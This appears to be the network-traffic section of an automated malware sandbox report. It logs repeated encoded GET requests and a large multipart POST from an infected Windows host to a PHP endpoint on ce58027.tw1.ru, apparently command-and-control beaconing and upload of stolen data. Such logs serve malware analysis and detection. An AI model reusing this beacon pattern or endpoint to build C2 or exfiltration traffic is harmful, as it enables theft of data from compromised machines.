Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=0VfiIiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&04d4a5280b397c7cb744792a503cb48e=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiI3E2YwMDOjlDN4EWYxYjMmRTM3AzNzkzM4UjZ2IWMzMGZ2E2NyATMmJiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&1b4307a464f9201736c9c444186ee18b=QX9JSUNJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIzMWZ1czNwYjZ4cjN5gTY0U2NjVmM4IDZllDN0QjYkRDNmFmMmRWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: POST /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary1w3KrLv8X3hkVvoaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: ce58027.tw1.ruContent-Length: 83176Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
